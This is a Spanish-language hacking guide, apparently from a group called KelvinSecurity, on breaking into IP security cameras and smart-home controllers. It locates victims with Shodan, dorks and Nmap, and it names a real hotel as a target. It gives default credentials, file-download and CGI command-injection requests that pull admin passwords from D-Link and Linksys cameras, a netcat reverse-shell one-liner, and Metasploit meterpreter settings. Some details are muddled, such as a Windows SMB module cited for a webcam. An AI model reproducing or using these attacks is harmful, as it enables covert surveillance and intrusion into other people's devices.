Documentos de Académico
Documentos de Profesional
Documentos de Cultura
CCTV IP Camera Hacking PDF
CCTV IP Camera Hacking PDF
Cámaras De Seguridad
Team : KelvinSecurity
WebCam y Camara De Seguridad
Debemos tener claro que existen 2 formas que podremos tener control sobre una
camara de seguridad.
1) En presencia del lugar que se encuentre que es cuando esta es una camara de
seguridad inalambrica y podemos conectarnos via “WiFi” hemos visto muchas
veces que si nos conectamos a la red local de un resturante o un lugar publico
podriamos notar que si buscamos la ip “Local” y scannemos con Nmap
notariamos puertos que nos llevarian a la plataforma de la camara IP.
2) Sin Presencia Del Hacker: Esta se produce cuando utilizamos las mismas
herraminetas identificamos la IP en la red y scanneamos con nmap o cualquier
otro scanner de puertos y identificar el puerto necesario para entrar al servidor
de la camara IP.
Adicional: Las camaras de seguridad estan protegidas con credenciales que pueden
venir por defectos pero pueden ser modificadas por el usuario que compro el producto
esta tambien puede ser utilizada con exactitud en solo algunos “Navegadores” y
Software por puertos diferentes.
Herramientas Que Utilizaremos
Nmap: Es un scanner que busca identificar los puertos que se encuentra en una
direccion IP puedes ejecutar este software por medio de la terminal o como cualquier
otro software con su infraestructura grafica.
Shodan: Como motor de busqueda ademas que cumple las 2 funciones que es buscar la
victma y scannear los puertos.
Buscando Camaras De Seguridad Con Dorks – Buscador
Las dorks las puedes encontrar en paginas webs como pastebin o blogs e aca un
ejemplo de las dorks:
http://pastebin.com/8cX7KAza
Google Buscador:
Google Imágenes:
WebCam Con Credenciales Y Sin Credenciales
Por medio de dorrks hemos encontrado esta camara en un hotel si vamos al “Main”
principal de la camara del servidor veremos a continuacion las opciones de control.
Puerto 80: como respuesta del servidor en HTTP/1.0 200 OK de peticion correcta
podemos entrar a la plataforma visualizar la camara pero sin aplicar cambios.
Puerto 21: De igual manera protegido esta vez no podemos entrar via ftp-21 al menos
que esta se establesca con una clave por defecto o algun exploit que nos de la
disponibilidad de romper esa peticon y saltar al otro punto.
Puerto 554: El protocolo de transmision hemos visto muchos estos en la NASA donde
utilizan el rtsp al navegador luego que sea ejecutado descarga el servidor este sera
ejecutado en tu ordenador y se abrira un reproducto para visualizar la camara de
seguridad.
Durante un tiempo conocemos el exploit de Arbitary File Dowload en este caso nos
aprobechamos de un vinculo que especifica un archivo o fichero pero en este caso
usaremos ese vinculo para descargar el config.ini donde se encuentra la contraseñas
con privilegios elevados para poder iniciar sesion tenemos el siguiente login:
Una vez descargado tendremos las credenciales para acceder a la plataform utilizando
las busquedas del user_id= y mediante shodan Server: Boa with IPv6.
Busando Camaras De Seguridad De Hoteles
Four Seasons Hotel es un hotel que queda en el Cairo y este hotel lo identifique por
medio de una proveedora ISP mediante el motor de buscador “shodan” y utilizando el
comando “Org” para buscar mas dispositivos en esta misma organiacion conocida
como
FOURSEASONS HOTEL in cairo a continuacion:
Ahora como observamos en organizacion hemos agregado la del hotel y Server BOA
como sabemos que si hacemos una busqueda como server:BOA en shodan tendremos
servidores que son camaras de seguridad IP.
ISP: Es la empresa que brinda conexión a Internet a sus clientes. Un ISP conecta a sus
usuarios a Internet a través de diferentes tecnologías como DSL, cablemódem, GSM,
dial-up, etcétera.
Controlar un hogar desde un celular por medio de una conexión wifi es posible y
cuando se convirte una IP publica y establece un servidor con una plataforma que se
iguala a la aplicación es cuando pone en riesgo a que un hacker “Audite” o “utilize el
hard coded de passwords list” que se encuentran como el listado de las contraseñas
por defecto para ingresar a cualquier dispositivo.
Loxone es uno de ellos hemos podido identificar e ingresar contraseña por defecto
una para el acceso a la configuracion por medio del puerto 8090 del administrador de
servidor y otro protegido aun mas pero podria estar en el hard coded de las
contraseñas por defecto e ingresar al puerto correcto para tener el remoto control
sobre la iluminacion y posiblemente otras opciones que nos proporcione la
plataforma este es igual como coger una tablet y realizar una conexión Wifi con un
controlador especifico y comenzar a manipular remotamente la habitacion:
Implementar un ataque y identificar servidor
Ahora les pedire que scannen la direccion IP con Nmap y ver si existe otro puerto en
este caso existe el puerto 80 protegida con otra contraseña que no esta por defecto.
Si agregamos la contraseña “admin:admin” miren:
Durante el scanneo de puertos como ven nos enteramos de que podemos entrar a
otros puertos como el 8090 con la credencial que entra en todas las plataforma de
loxone por medio de ese puerto credenciales conocidas como user:admin y
password:admin.
Una vez accedido tenemos el setup configuracion basica del servidor el remoto
control que son elevacion de privilegios y el user management para agregar usuarios
tambien tenemos el “Show Video” para ver en vivo la camara de seguridad.
Muy bien algo parecido a btcino solo que este no lo hemos puesto a prueba de
busqueda de directorios ya que sabemos que estan seguros e inspeccion de las
funciones con el java script.
Lo mismo puede pasar con los hoteles utilizando en shodan podemos indeitifcar
hoteles “servidor” y empezar a auditar uno de los consejos en empezar a auditar
estos dispositivos es utilizar herramientas basicas y otras moeradas como Burp Suite y
DirBuster – Url Fuzzer , Payload Command Injection y manualmente la inspeccion de
codigo tambien observando las funciones en java script a diferencia de las camaras IP
estas tienen por defecto en algunas un fichero .ini el cual se puede extraer buscando
su localizacion en oro caso el Remote code Execution Rce puede funcionar muy bien
aca.
Hablamos anteriormente de los ficheros .ini que tienen la configuracion dentro de ella
usuario y contraseña este es un metodo casi igualativo y funciona para camaras
siemens de igual manera a continuacion aremos lo siguiente:
cgi-bin/readfile.cgi?query=ADMINID
De vuelve una variable JavaScript que contenga las credenciales .
La mayoria de las camaras tienen el mismo problema pero alguna vez nos tocaria con
camaras como Hikvision donde existen unos que otros exploits que tienen
funcionalidad diferente como DoS o ByPass.
Para aplicar esta tecnica es necesario inciar sesion en la camara IP Axis en versiones
de AXIS 206 y 210 mediante esta tecnica utilizaremos netcat esa tecnica es reciente
del año 2016 dare detalles de la descripcion del exploit.
Descripcion:
Si usted tiene un usuario puede editar un archivo de inicio para esta ejecución de un
comando como root, como netcat utilizando conchas revertidas
Prueba:
(Rm / tmp / f; mkfifo / tmp / f; cat / tmp / f | / bin / sh -i 2> & 1 | nc <NUESTRO-
IP> 8080> / tmp / f) y
-panel de configuracion
- realizamos una determinada espera
-Webcam c160
Nuestra victima el modelo webcam C160 y metasploit cuenta con un modulo para
la explotacion de este modelo sencillamente metasploit facilita a personas a explotar
vulnerabirilidad de forma automatizada.
Una vez explota esta vulnerabirilidad el atacante tendra la visualizacion de su victima
integrando en la URL de su navegador un localhost.
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD
windows/meterpreter/reverse_tcp
http://localhost/webcam.htm
Una regla de acceso se crea para cada subdirectorio en el directorio raíz del servidor
web lighttpd, todos excepto para el directorio cgi-bin.
- Directorio CGI
La mayor parte de los scripts CGI de la cámara están ubicados en el directorio cgi
protegido. el desprotegida directorio cgi-bin sólo contiene un único archivo, rtpd.cgi,
que es un script bash que se puede utilizar para iniciar y detener RTP daemon de la
cámara.
Sin embargo, el guión rtpd.cgi tiene un grave defecto. Analiza los parámetros de
solicitud reemplazando todos los símbolos de unión en $ cadena de consulta con
espacios, y luego eval es el resultado:
$ wget http://192.168.1.101/cgi-bin/rtpd.cgi?action=start
$ wget http://192.168.1.101/cgi-bin/rtpd.cgi?reboot
Desde lighttpd y las secuencias de comandos CGI que se ejecuta ejecuta con
privilegios de root, también lo hacen el atacante de comandos. Lo que es más, se hizo
eco de la salida del comando (s) especificada volver al cliente web del atacante, que
proporciona un intérprete de comandos web integrado base de lanzamiento nuevos
ataques a la red.
Un atacante también puede utilizar esta vulnerabilidad para recuperar la contraseña
de administración de texto sin formato para la cámara.
El siguiente comando se ejecuta las secuencias de comandos de puesta en marcha de
la cámara con el fin para recuperar la contraseña de administración de la NVRAM:
Sustitución de los espacios con los símbolos de unión para su uso con rtpd.cgi, la
petición del atacante se convierte en:
$ wget
http://192.168.1.101/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount
Vendedor: Modelo:
D-Link DCS-1130
D-Link DCS-2102
D-Link DCS-2121
D-Link DCS-3410
D-Link DCS-5230
D-Link DCS-5605
Trendnet TV-IP512WN
- Comando shodan
Explotando Linksys WVC80N
En la configuración por defecto de la interfaz web, todos los usuarios sin privilegios
(incluyendo no autenticado usuarios) se les permite el acceso a la “/img/snapshot.cgi
URL” que es en realidad el enlace simbolico a la “/adm/ez.cgi”.
-WVC80N
Esto es debido a que el dispositivo WVC80N utiliza una cadena de clave base 64 no
estándar, tal como se documenta en el guía del usuario del dispositivo:
-GUIA
Sustitución de la cadena de clave base 64 estándar con esta costumbre uno de cada
módulo de base 64 de Python es trivial, y permite a un atacante para decodificar
correctamente todo el archivo de configuración, que incluye de texto sin formato
credenciales administrativas e inalámbricas:
Mientras que la administración interfaz está protegido con contraseña, los usuarios
pueden acceder a cualquier recurso sin autenticación puede abrir una superficie de
ataque más grande para la explotación. En este caso, el vector de ataque toma la
forma de la página oidtable.cgi, que puede ser solicitada por los usuarios no
autenticados. Esta página CGI acepta un solo parámetro, grep, que se utiliza para
filtrar los resultados devueltos por la página oidtable.cgi:
$ wget http://192.168.101/oidtable.cgi?grep=’$IFS/tmp/a;ps;
A pesar de toda la cadena de grep se limita a 32 caracteres, los comandos más largos
podría simplemente se hizo eco en un script de shell para su posterior ejecución.
Además, esta cámara viene con netcat instalado, y con la opción -e infame habilitado,
lo que permite a un atacante para iniciar una reverse-callback shell.